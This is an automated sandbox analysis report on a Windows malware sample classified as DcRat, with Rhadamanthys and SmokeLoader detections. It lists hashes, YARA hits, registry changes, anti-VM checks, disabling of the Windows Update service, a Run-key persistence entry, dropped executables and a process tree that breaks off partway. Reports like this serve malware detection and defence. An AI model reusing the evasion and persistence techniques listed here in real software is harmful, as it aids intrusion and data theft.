dcrat | 19d17b27a1b48b46683e2ff55d56945412d0588adc2eca846026512c0a3e8290

Analysis

max time kernel
93s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
25-02-2023 19:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

846a8a7786c7daf46f55c9eca47327c5.exe
Size

251KB
MD5

846a8a7786c7daf46f55c9eca47327c5
SHA1

18b4a055bbf85199bfc455b2af5d9481e84dad7f
SHA256

19d17b27a1b48b46683e2ff55d56945412d0588adc2eca846026512c0a3e8290
SHA512

cdcfc4aa3e0d8c8276de2439addad50da5afa2bb149f252ffb908b6ac2eca87d7ed909534ba7358524772eed8e8e89785823e5dc83874f4d8528a260ae6612f5
SSDEEP

3072:xhUC/0Lx5TKI+FlaGCX2Ubt0SmVyGGyrauxZNCWhPD:HUi0LeI+FQJTGbGuzNCW5

Score

10^/10

dcrat rhadamanthys smokeloader agilenet backdoor evasion infostealer persistence rat spyware stealer themida trojan

Malware Config

Signatures

DcRat 3 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Processes:

846a8a7786c7daf46f55c9eca47327c5.exeschtasks.exeschtasks.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 846a8a7786c7daf46f55c9eca47327c5.exe
2844 schtasks.exe
2876 schtasks.exe

Detect rhadamanthys stealer shellcode 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3608-397-0x00000000006D0000-0x00000000006EC000-memory.dmp	family_rhadamanthys
behavioral2/memory/3608-401-0x00000000006D0000-0x00000000006EC000-memory.dmp	family_rhadamanthys
behavioral2/memory/3608-418-0x0000000002490000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/3608-452-0x00000000006D0000-0x00000000006EC000-memory.dmp	family_rhadamanthys

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4640-134-0x0000000002EF0000-0x0000000002EF9000-memory.dmp	family_smokeloader

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

tmp8A58.tmpf7g57uyun0yo.exeWinUpdate.exe

description	pid	process	target process
PID 1092 created 3172	1092	tmp8A58.tmpf7g57uyun0yo.exe	Explorer.EXE
PID 1092 created 3172	1092	tmp8A58.tmpf7g57uyun0yo.exe	Explorer.EXE
PID 1092 created 3172	1092	tmp8A58.tmpf7g57uyun0yo.exe	Explorer.EXE
PID 1092 created 3172	1092	tmp8A58.tmpf7g57uyun0yo.exe	Explorer.EXE
PID 3860 created 3172	3860	WinUpdate.exe	Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

4691.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4691.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4691.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/4872-174-0x0000000000980000-0x0000000000B10000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4691.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4691.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4691.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3EA1.exe4691.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	3EA1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	4691.exe

Executes dropped EXE 9 IoCs

Processes:

2654.exe3113.exe3EA1.exe4691.exeiheawvbtmp8A58.tmpf7g57uyun0yo.exetmp8A59.tmptr11blxmizw.exeWinUpdate.exeAPIInfrastructure.exe

pid	process
3988	2654.exe
3608	3113.exe
4872	3EA1.exe
2664	4691.exe
4728	iheawvb
1092	tmp8A58.tmpf7g57uyun0yo.exe
3116	tmp8A59.tmptr11blxmizw.exe
3860	WinUpdate.exe
2496	APIInfrastructure.exe

Obfuscated with Agile.Net obfuscator 8 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral2/memory/2664-187-0x0000000000F90000-0x0000000001522000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp8A59.tmptr11blxmizw.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp8A59.tmptr11blxmizw.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp8A59.tmptr11blxmizw.exe	agile_net
behavioral2/memory/2664-486-0x0000000000F90000-0x0000000001522000-memory.dmp	agile_net
behavioral2/memory/3116-488-0x0000000000B60000-0x0000000000B70000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe	agile_net
C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\4691.exe	themida
C:\Users\Admin\AppData\Local\Temp\4691.exe	themida
behavioral2/memory/2664-187-0x0000000000F90000-0x0000000001522000-memory.dmp	themida
behavioral2/memory/2664-486-0x0000000000F90000-0x0000000001522000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

tmp8A59.tmptr11blxmizw.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\API Infrastructure v1.21 = "C:\\Users\\Admin\\AppData\\Local\\API Infrastructure v1.21\\APIInfrastructure.exe"	tmp8A59.tmptr11blxmizw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

4691.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4691.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

135 ip-api.com
137 icanhazip.com
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

4691.exe3113.exe

pid process

2664 4691.exe
3608 3113.exe
3608 3113.exe
3608 3113.exe
Drops file in Program Files directory 1 IoCs

Processes:

tmp8A58.tmpf7g57uyun0yo.exe

description ioc process

File created C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe tmp8A58.tmpf7g57uyun0yo.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4820 sc.exe
1272 sc.exe
2488 sc.exe
1508 sc.exe
4288 sc.exe
4116 sc.exe
2468 sc.exe
4496 sc.exe
2796 sc.exe
1892 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2120 3608 WerFault.exe 3113.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4691.exe

flow	ioc
135	ip-api.com
137	icanhazip.com

pid	process
2664	4691.exe
3608	3113.exe
3608	3113.exe
3608	3113.exe

description	ioc	process
File created	C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe	tmp8A58.tmpf7g57uyun0yo.exe

pid	process
4820	sc.exe
1272	sc.exe
2488	sc.exe
1508	sc.exe
4288	sc.exe
4116	sc.exe
2468	sc.exe
4496	sc.exe
2796	sc.exe
1892	sc.exe

pid	pid_target	process	target process
2120	3608	WerFault.exe	3113.exe

Checks SCSI registry key(s) 3 TTPs 11 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

846a8a7786c7daf46f55c9eca47327c5.exe3113.exeiheawvb

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	846a8a7786c7daf46f55c9eca47327c5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	846a8a7786c7daf46f55c9eca47327c5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	846a8a7786c7daf46f55c9eca47327c5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	3113.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	3113.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iheawvb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3113.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3113.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3113.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iheawvb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iheawvb

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tmp8A59.tmptr11blxmizw.exeAPIInfrastructure.exe4691.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	tmp8A59.tmptr11blxmizw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	tmp8A59.tmptr11blxmizw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	APIInfrastructure.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	APIInfrastructure.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4691.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4691.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	4691.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	4691.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2844 schtasks.exe
2876 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1596 timeout.exe

pid	process
2844	schtasks.exe
2876	schtasks.exe

pid	process
1596	timeout.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

846a8a7786c7daf46f55c9eca47327c5.exeExplorer.EXE

pid	process
4640	846a8a7786c7daf46f55c9eca47327c5.exe
4640	846a8a7786c7daf46f55c9eca47327c5.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3172 Explorer.EXE

pid	process
3172	Explorer.EXE

Suspicious behavior: MapViewOfSection 20 IoCs

Processes:

846a8a7786c7daf46f55c9eca47327c5.exeExplorer.EXEiheawvb

pid	process
4640	846a8a7786c7daf46f55c9eca47327c5.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
4728	iheawvb

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXE4691.exe3EA1.exemsiexec.exe3113.exetmp8A59.tmptr11blxmizw.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeDebugPrivilege	2664	4691.exe
Token: SeDebugPrivilege	4872	3EA1.exe
Token: SeSecurityPrivilege	656	msiexec.exe
Token: SeShutdownPrivilege	3608	3113.exe
Token: SeCreatePagefilePrivilege	3608	3113.exe
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeDebugPrivilege	3116	tmp8A59.tmptr11blxmizw.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeIncreaseQuotaPrivilege	4292	powershell.exe
Token: SeSecurityPrivilege	4292	powershell.exe
Token: SeTakeOwnershipPrivilege	4292	powershell.exe
Token: SeLoadDriverPrivilege	4292	powershell.exe
Token: SeSystemProfilePrivilege	4292	powershell.exe
Token: SeSystemtimePrivilege	4292	powershell.exe
Token: SeProfSingleProcessPrivilege	4292	powershell.exe
Token: SeIncBasePriorityPrivilege	4292	powershell.exe
Token: SeCreatePagefilePrivilege	4292	powershell.exe
Token: SeBackupPrivilege	4292	powershell.exe
Token: SeRestorePrivilege	4292	powershell.exe
Token: SeShutdownPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeSystemEnvironmentPrivilege	4292	powershell.exe
Token: SeRemoteShutdownPrivilege	4292	powershell.exe
Token: SeUndockPrivilege	4292	powershell.exe
Token: SeManageVolumePrivilege	4292	powershell.exe
Token: 33	4292	powershell.exe
Token: 34	4292	powershell.exe
Token: 35	4292	powershell.exe
Token: 36	4292	powershell.exe
Token: SeIncreaseQuotaPrivilege	4292	powershell.exe
Token: SeSecurityPrivilege	4292	powershell.exe
Token: SeTakeOwnershipPrivilege	4292	powershell.exe
Token: SeLoadDriverPrivilege	4292	powershell.exe
Token: SeSystemProfilePrivilege	4292	powershell.exe
Token: SeSystemtimePrivilege	4292	powershell.exe
Token: SeProfSingleProcessPrivilege	4292	powershell.exe
Token: SeIncBasePriorityPrivilege	4292	powershell.exe
Token: SeCreatePagefilePrivilege	4292	powershell.exe
Token: SeBackupPrivilege	4292	powershell.exe
Token: SeRestorePrivilege	4292	powershell.exe
Token: SeShutdownPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeSystemEnvironmentPrivilege	4292	powershell.exe
Token: SeRemoteShutdownPrivilege	4292	powershell.exe
Token: SeUndockPrivilege	4292	powershell.exe
Token: SeManageVolumePrivilege	4292	powershell.exe
Token: 33	4292	powershell.exe
Token: 34	4292	powershell.exe
Token: 35	4292	powershell.exe
Token: 36	4292	powershell.exe
Token: SeIncreaseQuotaPrivilege	4292	powershell.exe
Token: SeSecurityPrivilege	4292	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE4691.execmd.exetmp8A59.tmptr11blxmizw.execmd.exe

description	pid	process	target process
PID 3172 wrote to memory of 3988	3172	Explorer.EXE	2654.exe
PID 3172 wrote to memory of 3988	3172	Explorer.EXE	2654.exe
PID 3172 wrote to memory of 3608	3172	Explorer.EXE	3113.exe
PID 3172 wrote to memory of 3608	3172	Explorer.EXE	3113.exe
PID 3172 wrote to memory of 3608	3172	Explorer.EXE	3113.exe
PID 3172 wrote to memory of 4872	3172	Explorer.EXE	3EA1.exe
PID 3172 wrote to memory of 4872	3172	Explorer.EXE	3EA1.exe
PID 3172 wrote to memory of 2664	3172	Explorer.EXE	4691.exe
PID 3172 wrote to memory of 2664	3172	Explorer.EXE	4691.exe
PID 3172 wrote to memory of 2664	3172	Explorer.EXE	4691.exe
PID 3172 wrote to memory of 3556	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3556	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3556	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3556	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 960	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 960	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 960	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 4616	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 4616	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 4616	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 4616	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2756	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2756	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2756	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2228	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2228	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2228	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2228	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2656	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2656	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2656	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 2656	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3668	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3668	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3668	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 3668	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 380	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 380	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 380	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 1660	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 1660	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 1660	3172	Explorer.EXE	explorer.exe
PID 3172 wrote to memory of 1660	3172	Explorer.EXE	explorer.exe
PID 2664 wrote to memory of 1092	2664	4691.exe	tmp8A58.tmpf7g57uyun0yo.exe
PID 2664 wrote to memory of 1092	2664	4691.exe	tmp8A58.tmpf7g57uyun0yo.exe
PID 2664 wrote to memory of 3116	2664	4691.exe	tmp8A59.tmptr11blxmizw.exe
PID 2664 wrote to memory of 3116	2664	4691.exe	tmp8A59.tmptr11blxmizw.exe
PID 2796 wrote to memory of 4288	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 4288	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 1892	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 1892	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 4116	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 4116	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 2468	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 2468	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 4820	2796	cmd.exe	sc.exe
PID 2796 wrote to memory of 4820	2796	cmd.exe	sc.exe
PID 3116 wrote to memory of 4228	3116	tmp8A59.tmptr11blxmizw.exe	cmd.exe
PID 3116 wrote to memory of 4228	3116	tmp8A59.tmptr11blxmizw.exe	cmd.exe
PID 2796 wrote to memory of 2612	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2612	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 3864	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 3864	2796	cmd.exe	reg.exe
PID 4228 wrote to memory of 1596	4228	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172

C:\Users\Admin\AppData\Local\Temp\846a8a7786c7daf46f55c9eca47327c5.exe
"C:\Users\Admin\AppData\Local\Temp\846a8a7786c7daf46f55c9eca47327c5.exe"
2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4640

C:\Users\Admin\AppData\Local\Temp\2654.exe
C:\Users\Admin\AppData\Local\Temp\2654.exe
2⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\AppData\Local\Temp\3113.exe
C:\Users\Admin\AppData\Local\Temp\3113.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\SysWOW64\WerFault.exe
